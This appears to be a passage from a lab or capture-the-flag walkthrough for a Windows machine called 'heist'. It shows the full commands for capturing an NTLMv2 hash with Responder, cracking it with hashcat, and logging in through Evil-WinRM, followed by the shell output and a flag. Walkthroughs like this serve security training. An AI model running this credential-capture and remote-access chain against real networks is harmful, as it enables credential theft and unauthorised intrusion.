Foothold

$ sudo responder -I tun0

$ hashcat -m 5600 enox.hash ~/rockyou.txt -O

enox:california

$ netexec winrm 192.168.241.165 -u 'enox' -p 'california'

$ evil-winrm -u enox -p california -i 192.168.241.165                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami; type C:\Users\enox\Desktop\local.txt;ipconfig
heist\enox
97c936085d69f024b40f6158385e4594

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::bc21:839e:775:80d3%7
   IPv4 Address. . . . . . . . . . . : 192.168.241.165
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254
*Evil-WinRM* PS C:\Users\enox\Documents>

Previous8080 NextEnumeration

Last updated 10 months ago